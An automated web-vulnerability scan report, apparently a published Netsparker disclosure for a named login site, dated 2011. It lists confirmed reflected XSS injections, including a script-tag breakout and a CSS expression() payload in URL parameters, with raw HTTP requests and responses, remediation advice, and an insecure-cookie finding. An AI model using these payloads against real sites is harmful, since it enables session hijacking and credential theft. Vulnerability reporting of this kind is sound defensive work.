The DORK Report

Loading
XSS.CX Home
Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection

Netsparker - Scan Report Summary
TARGET URL
 https://www.ari-allternet.com/Login/BrowserDe...
SCAN DATE
 3/10/2011 2:24:20 PM
REPORT DATE
 3/10/2011 2:27:37 PM
SCAN DURATION
 00:01:24

Total Requests

Average Speed

req/sec.
12
identified
8
confirmed
0
critical
3
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
33 %
LOW
42 %
INFORMATION
25 %
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /Login/Password.asp

/Login/Password.asp CONFIRMED

https://www.ari-allternet.com/Login/Password.asp?strError=1&strUserName='%22--%3E%3C/style%3E%3C/scr..

Parameters

Parameter Type Value
strError GET 1
strUserName GET '"--></style></script><script>alert(0x0002B5)</script>

Request

GET /Login/Password.asp?strError=1&strUserName='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002B5)%3C/script%3E HTTP/1.1
Referer: https://www.ari-allternet.com/Login/SendPassword.asp?strUserName=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Cookie: ASPSESSIONIDSQRSBDBT=PNODLHGABDCDKMLGABOMPBPH; SessionID=108740320; DontShow=1; S%5FID=108740319; DoNotShow=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 20:23:18 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 5912
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:23:18 GMT
Cache-control: private





<html>
<head>
<STYLE type="text/css">
.headerTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 13pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arieal;
font_Size: 16pt
}
.titleTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.labelTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 12pt;
COLOR: black;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.fieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 7pt;
COLOR: #000099;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
BORDER-RIGHT: #78263a 1px solid;
BORDER-TOP: #78263a 1px solid;
BACKGROUND: #ffffff;
BORDER-LEFT: #78263a 1px solid;
BORDER-BOTTOM: #78263a 1px solid;
}
.blackfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #000000;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.greyfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #999999;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.redfieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 9pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.smallTxt
{
FONT-SIZE: 7pt;
COLOR: #262626;
FONT-STYLE: normal;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.bluefieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.activetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Helvetica, Ariel;
BACKGROUND-COLOR: #cccccc
}
.notactivetableTxt
{
FONT-WEIGHT: bold;
FONT-SIZE: 10pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Ariel;
BACKGROUND-COLOR: #0000ff
}
.errorTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 8pt;
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Arial, Verdana
}
.ageneralblue
{
FONT-SIZE: 11pt;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.ageneralblue:hover
{
FONT-SIZE: 11pt;
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.ageneralblue:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}

.awhitebold
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ffffff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial
}
.awhitebold:hover
{
FONT-WEIGHT: bold;
FONT-SIZE: 11pt;
COLOR: #ccccff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
TEXT-DECORATION: underline
}
.awhitebold:active
{
FONT-SIZE: 11pt;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
font_weight: bold
}


A.ageneral:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
}
A.ageneral:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
}

A.ageneralbold:link {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:visited {
color: #8E0D34;
size: 11pt;
text-decoration: none;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}
A.ageneralbold:hover {
color: #8E0D34;
size: 11pt;
text-decoration: underline;
family: 'MS Sans Serif', Verdana, Arial;
weight: bold;
}

table
{
border-color: #78263a;
}
</style>


<Script language = "javascript">
<!--



function LTrim(str){
for (var i=0; str.charAt(i)==" "; i++);
return str.substring(i,str.length);
}



function RTrim(str){
for (var i=str.length-1; str.charAt(i)==" "; i--);
return str.substring(0,i+1);
}



function Trim(str){
return LTrim(RTrim(str));
}



function ToProperCase(str) {
str = str.toLowerCase();
var strFirstLetter = str.substring(0, 1);
strFirstLetter = strFirstLetter.toUpperCase();
var len = str.length;
var strTheRest = str.substring(1, len);
str = strFirstLetter + strTheRest;
return str;
}



function HandleOK(strEmployeeID) {
var resolution = screen.height;
window.parent.parent.parent.Row1.location = "../Diary/FinishDiaryTop.asp?resolution=" + resolution + "&strEmployeeID=" + strEmployeeID;
window.parent.parent.parent.Row2.location = "../Diary/FinishDiaryAssign.asp?resolution=" + resolution;
window.parent.parent.parent.Row3.location = "../Diary/FinishDiaryBasics.asp?resolution=" + resolution + "&strEmployeeID=" + strEmployeeID;
}

-->
</Script>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<title>Password Info</title>

<script language="javascript">
<!--
function CheckUserName() {

var strUserName = Trim(document.forms[0].UserName.value);
if (strUserName.length ==0) {
alert ("Enter your User Name.");
return false;
}

window.location = "SendPassword.asp?strUserName=" + strUserName;
}
-->
</script>

</head>
<body>
<table cellpadding="6" width="100%">
<form name="Password">
<tr><td><img src="../Images/blueCodjpg.jpg"></td></tr>
<tr>
<td class="titleTxt">
Your password will be sent to your e-mail address.
</td>
</tr>
<tr>
<td class="fieldTxt">
Username:&nbsp;
</td>
</tr>

<tr>
<td class="errorTxt">
The Username you provided is not a valid Username.
</td>
</tr>

<tr>
<td>
<input type="text" name="UserName" value="'"--></style></script><script>netsparker(0x0002B5)</script>" maxlength="50" style="HEIGHT: 25px; WIDTH: 200px">
</td>
</tr>

<tr>
<td>
<input type="button" name="Send" value="Send me my Password" onclick="CheckUserName()">
<p>
<hr>
</td>
</tr>
</form>
</table>
</body>
</html>
- /PVAllOne/AllOne/AllWebStart.asp

/PVAllOne/AllOne/AllWebStart.asp CONFIRMED

https://www.ari-allternet.com/PVAllOne/AllOne/AllWebStart.asp?resolution=%22%20stYle=%22x:expre/**/s..

Parameters

Parameter Type Value
resolution GET " stYle="x:expre/**/ssion(alert(9))

Request

GET /PVAllOne/AllOne/AllWebStart.asp?resolution=%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: https://www.ari-allternet.com/PVAllOne/AllOne/AllWeb.asp?strUserID=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Cookie: ASPSESSIONIDSQRSBDBT=COODLHGAIJFNOKJIDDCCPHHJ; SessionID=108740320; DontShow=1; S%5FID=108740323; DoNotShow=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 20:23:47 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 8078
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:23:46 GMT
Set-Cookie: S%5FID=108740323; expires=Fri, 11-Mar-2011 05:00:00 GMT; path=/
Cache-control: private




<HTML>
<HEAD>
<STYLE type="text/css">
.headerTxt
{
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arieal;
FONT-SIZE: 13pt;
FONT-WEIGHT: bold;
font_Size: 16pt
}
.titleTxt
{
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold
}
.labelTxt
{
COLOR: black;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 12pt;
FONT-WEIGHT: bold
}
.fieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #78263a;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial

}
.blackfieldTxt
{
COLOR: #000000;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: normal
}
.greyfieldTxt
{
COLOR: #999999;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: normal
}
.redfieldTxt
{
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 9pt;
FONT-WEIGHT: normal
}
.smallTxt
{
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 7pt;
FONT-STYLE: normal
}
.bluefieldTxt
{
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: normal
}
.activetableTxt
{
BACKGROUND-COLOR: #cccccc;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Helvetica, Ariel;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold
}
.notactivetableTxt
{
BACKGROUND-COLOR: #0000ff;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Ariel;
FONT-SIZE: 10pt;
FONT-WEIGHT: bold
}
.errorTxt
{
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Arial, Verdana;
FONT-SIZE: 8pt;
FONT-WEIGHT: normal
}
.ageneralblue
{
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt
}
.ageneralblue:hover
{
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
TEXT-DECORATION: underline
}
.ageneralblue:active
{
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt
}
.ageneral
{
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt
}
.ageneral:hover
{
COLOR: #0000ff;
FONT-SIZE: 11pt;
TEXT-DECORATION: underline
}
.ageneral:active
{
COLOR: #cc66ff;
FONT-SIZE: 11pt
}
.ageneralbold
{
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold
}
.ageneralbold:hover
{
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold;
TEXT-DECORATION: underline
}
.ageneralbold:active
{
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
font_weight: bold
}
.awhitebold
{
COLOR: #ffffff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold
}
.awhitebold:hover
{
COLOR: #ccccff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold;
TEXT-DECORATION: underline
}
.awhitebold:active
{
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
font_weight: bold
}
.txtBxCapture {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
color: #262626;
border-top-width: thin;
border-right-width: thin;
border-bottom-width: thin;
border-left-width: thin;
border-top-style: solid;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: solid;
border-top-color: #78263a;
border-right-color: #78263a;
border-bottom-color: #78263a;
border-left-color: #78263a;
font-weight: normal;

}

.btnBxCapture {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
border-top-width: thin;
border-right-width: thin;
border-bottom-width: thin;
border-left-width: thin;
border-top-style: solid;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: solid;
border-top-color: #78263a;
border-right-color: #78263a;
border-bottom-color: #78263a;
border-left-color: #78263a;
font-weight: normal;
color: #FFFFFF;
background-color: #408080;
}

.tvFolderTxtPointer {
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 10pt;
FONT-WEIGHT: normal;
cursor:pointer;
}
.tvFolderPointer {
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 10pt;
FONT-WEIGHT: bold;
cursor:pointer;
}

.formfield
{
color: #000000;
font-family: Arial, Verdana;
font-size: 10pt;
border: 1px solid #A3A0A0;
}

.formfield_readonly
{
border-color: #78263a;
table-border-color-dark : #78263a;
table-border-color-light : #78263a;
}

</style>


<!--
Public Property Get x()
x ==getVal("x")
End Property
Public Property Let x(Value)
Call letVal("x", Value)
End Property
-->


<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<Title>AllWeb</Title>

<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/THEME.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/GRAPH0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/COLOR0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/CUSTOM.CSS" VI6.0THEME="Bars"></head>

<Script language = "javascript">

var closeWin;
var retrycount = 0;


function backToLogin()
{
if (this.opener.closed)
{
var newloginwin = window.open("../../Login/Login.asp");
newloginwin.focus();
}
else
{
this.opener.parent.location = "../../Login/Login.asp";
this.opener.parent.focus();
}
window.location = "../include/window_closer.html";
}



function LogOut() {
closeWin = window.open("../Login/LogoutImproper.asp", '_LogOutImproper', 'menubar = false, width =300, height = 200, top = 100, left = 100');
if (navigator.appName == "Netscape") {
closeWin.outerWidth = 300;
closeWin.outerHeight = 200;
closeWin.moveTo(100, 100);
}
// Wait for the logout window above to complete, allow only 5 seconds for this then
// we will show an error message. Tried doing this using a settimeout but for whatever
// reason it wouldn't work.
var starttime = getHourMins();
var keeptrying = true;
var error = false;

while (keeptrying)
{
var currtime = getHourMins();
if (!closeWin.closed)
{
if ((currtime - starttime) > 5 || (currtime - starttime) < 0)
{
keeptrying = false;
error = true;
}
}
else
{
keeptrying = false;
}
}

if (!error)
{
backToLogin();
}
else
{
alert('Allternet Error: Normal Allternet logout failed.\nYou will need to clear your session the next\ntime you login.');
backToLogin();
}
}


function getHourMins()
{
var d = new Date();
var hourmins = (d.getHours() * 60 * 60) + (d.getMinutes()*60) + d.getSeconds();
return hourmins;
}



function LogOutOld() {
var closeWin = window.open("../Login/LogoutImproper.asp", '_LogOutImproper', 'menubar = false, width =300, height = 200, top = 100, left = 100');
if (navigator.appName == "Netscape") {
closeWin.outerWidth = 300;
closeWin.outerHeight = 200;
closeWin.moveTo(100, 100);
}
window.location = "../include/window_closer.html";
}

</Script>
</HEAD>


<FRAMESET rows ="100%, *" FRAMESPACING="0" FRAMEBORDER="0" border="0" onunload = "LogOut()">
<frame name = "Row1" SRC = "OpenAllOne.asp?resolution=" stYle="x:expre/**/ssion(netsparker(9))" NORESIZE MARGINHEIGHT="0" MARGINWIDTH="0" FRAMESPACING="0" FRAMEBORDER="no" FRAMEBORDER="0" FRAMEBORDER="False">
<!-- <frame name = "Row2" SRC = "Blank.asp" NORESIZE MARGINHEIGHT="0" MARGINWIDTH="0" FRAMESPACING="0" FRAMEBORDER="no" FRAMEBORDER="0" FRAMEBORDER="False"> -->
</frameset>



</HTML>
- /PVAllOne/AllOne/AllWebStart.asp

/PVAllOne/AllOne/AllWebStart.asp CONFIRMED

https://www.ari-allternet.com/PVAllOne/AllOne/AllWebStart.asp?resolution=%22%20stYle=%22x:expre/**/s..

Parameters

Parameter Type Value
resolution GET " stYle="x:expre/**/ssion(alert(9))
strUserID GET 3

Request

GET /PVAllOne/AllOne/AllWebStart.asp?resolution=%22%20stYle=%22x:expre/**/ssion(netsparker(9))%20&strUserID=3 HTTP/1.1
Referer: https://www.ari-allternet.com/PVAllOne/AllOne/AllWeb.asp?strUserID=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.ari-allternet.com
Cookie: ASPSESSIONIDSQRSBDBT=FOODLHGAGIEKJCCIKKDHMECE; SessionID=108740320; DontShow=1; S%5FID=108740326; DoNotShow=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 20:24:05 GMT
Server: Microsoft-IIS/6.0
www.ari-allternet.com:
X-Powered-By: ASP.NET
Content-Length: 8078
Content-Type: text/html
Expires: Wed, 09 Mar 2011 20:24:04 GMT
Set-Cookie: S%5FID=108740326; expires=Fri, 11-Mar-2011 05:00:00 GMT; path=/
Cache-control: private




<HTML>
<HEAD>
<STYLE type="text/css">
.headerTxt
{
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arieal;
FONT-SIZE: 13pt;
FONT-WEIGHT: bold;
font_Size: 16pt
}
.titleTxt
{
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold
}
.labelTxt
{
COLOR: black;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 12pt;
FONT-WEIGHT: bold
}
.fieldTxt
{
FONT-WEIGHT: normal;
FONT-SIZE: 11pt;
COLOR: #78263a;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial

}
.blackfieldTxt
{
COLOR: #000000;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: normal
}
.greyfieldTxt
{
COLOR: #999999;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: normal
}
.redfieldTxt
{
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 9pt;
FONT-WEIGHT: normal
}
.smallTxt
{
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 7pt;
FONT-STYLE: normal
}
.bluefieldTxt
{
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: normal
}
.activetableTxt
{
BACKGROUND-COLOR: #cccccc;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Helvetica, Ariel;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold
}
.notactivetableTxt
{
BACKGROUND-COLOR: #0000ff;
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Ariel;
FONT-SIZE: 10pt;
FONT-WEIGHT: bold
}
.errorTxt
{
COLOR: red;
FONT-FAMILY: 'MS Sans Serif', Arial, Verdana;
FONT-SIZE: 8pt;
FONT-WEIGHT: normal
}
.ageneralblue
{
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt
}
.ageneralblue:hover
{
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
TEXT-DECORATION: underline
}
.ageneralblue:active
{
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt
}
.ageneral
{
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt
}
.ageneral:hover
{
COLOR: #0000ff;
FONT-SIZE: 11pt;
TEXT-DECORATION: underline
}
.ageneral:active
{
COLOR: #cc66ff;
FONT-SIZE: 11pt
}
.ageneralbold
{
COLOR: #333399;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold
}
.ageneralbold:hover
{
COLOR: #0000ff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold;
TEXT-DECORATION: underline
}
.ageneralbold:active
{
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
font_weight: bold
}
.awhitebold
{
COLOR: #ffffff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold
}
.awhitebold:hover
{
COLOR: #ccccff;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
FONT-WEIGHT: bold;
TEXT-DECORATION: underline
}
.awhitebold:active
{
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 11pt;
font_weight: bold
}
.txtBxCapture {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
color: #262626;
border-top-width: thin;
border-right-width: thin;
border-bottom-width: thin;
border-left-width: thin;
border-top-style: solid;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: solid;
border-top-color: #78263a;
border-right-color: #78263a;
border-bottom-color: #78263a;
border-left-color: #78263a;
font-weight: normal;

}

.btnBxCapture {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
border-top-width: thin;
border-right-width: thin;
border-bottom-width: thin;
border-left-width: thin;
border-top-style: solid;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: solid;
border-top-color: #78263a;
border-right-color: #78263a;
border-bottom-color: #78263a;
border-left-color: #78263a;
font-weight: normal;
color: #FFFFFF;
background-color: #408080;
}

.tvFolderTxtPointer {
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 10pt;
FONT-WEIGHT: normal;
cursor:pointer;
}
.tvFolderPointer {
COLOR: #262626;
FONT-FAMILY: 'MS Sans Serif', Verdana, Arial;
FONT-SIZE: 10pt;
FONT-WEIGHT: bold;
cursor:pointer;
}

.formfield
{
color: #000000;
font-family: Arial, Verdana;
font-size: 10pt;
border: 1px solid #A3A0A0;
}

.formfield_readonly
{
border-color: #78263a;
table-border-color-dark : #78263a;
table-border-color-light : #78263a;
}

</style>


<!--
Public Property Get x()
x ==getVal("x")
End Property
Public Property Let x(Value)
Call letVal("x", Value)
End Property
-->


<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<Title>AllWeb</Title>

<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/THEME.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/GRAPH0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/COLOR0.CSS" VI6.0THEME="Bars">
<link REL="stylesheet" TYPE="text/css" HREF="../_Themes/bars/CUSTOM.CSS" VI6.0THEME="Bars"></head>

<Script language = "javascript">

var closeWin;
var retrycount = 0;


function backToLogin()
{
if (this.opener.closed)
{
var newloginwin = window.open("../../Login/Login.asp");
newloginwin.focus();
}
else
{
this.opener.parent.location = "../../Login/Login.asp";
this.opener.parent.focus();
}
window.location = "../include/window_closer.html";
}



function LogOut() {
closeWin = window.open("../Login/LogoutImproper.asp", '_LogOutImproper', 'menubar = false, width =300, height = 200, top = 100, left = 100');
if (navigator.appName == "Netscape") {
closeWin.outerWidth = 300;
closeWin.outerHeight = 200;
closeWin.moveTo(100, 100);
}
// Wait for the logout window above to complete, allow only 5 seconds for this then
// we will show an error message. Tried doing this using a settimeout but for whatever
// reason it wouldn't work.
var starttime = getHourMins();
var keeptrying = true;
var error = false;

while (keeptrying)
{
var currtime = getHourMins();
if (!closeWin.closed)
{
if ((currtime - starttime) > 5 || (currtime - starttime) < 0)
{
keeptrying = false;
error = true;
}
}
else
{
keeptrying = false;
}
}

if (!error)
{
backToLogin();
}
else
{
alert('Allternet Error: Normal Allternet logout failed.\nYou will need to clear your session the next\ntime you login.');
backToLogin();
}
}


function getHourMins()
{
var d = new Date();
var hourmins = (d.getHours() * 60 * 60) + (d.getMinutes()*60) + d.getSeconds();
return hourmins;
}



function LogOutOld() {
var closeWin = window.open("../Login/LogoutImproper.asp", '_LogOutImproper', 'menubar = false, width =300, height = 200, top = 100, left = 100');
if (navigator.appName == "Netscape") {
closeWin.outerWidth = 300;
closeWin.outerHeight = 200;
closeWin.moveTo(100, 100);
}
window.location = "../include/window_closer.html";
}

</Script>
</HEAD>


<FRAMESET rows ="100%, *" FRAMESPACING="0" FRAMEBORDER="0" border="0" onunload = "LogOut()">
<frame name = "Row1" SRC = "OpenAllOne.asp?resolution=" stYle="x:expre/**/ssion(netsparker(9))" NORESIZE MARGINHEIGHT="0" MARGINWIDTH="0" FRAMESPACING="0" FRAMEBORDER="no" FRAMEBORDER="0" FRAMEBORDER="False">
<!-- <frame name = "Row2" SRC = "Blank.asp" NORESIZE MARGINHEIGHT="0" MARGINWIDTH="0" FRAMESPACING="0" FRAMEBORDER="no" FRAMEBORDER="0" FRAMEBORDER="False"> -->
</frameset>



</HTML>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /Login/BrowserDeclined.asp

/Login/BrowserDeclined.asp CONFIRMED

https://www.ari-allternet.com/Login/BrowserDeclined.asp

Identified Cookie

ASPSESSIONIDSQRSBDBT

Request

GET /Login/BrowserDeclined.asp HTTP/1.1
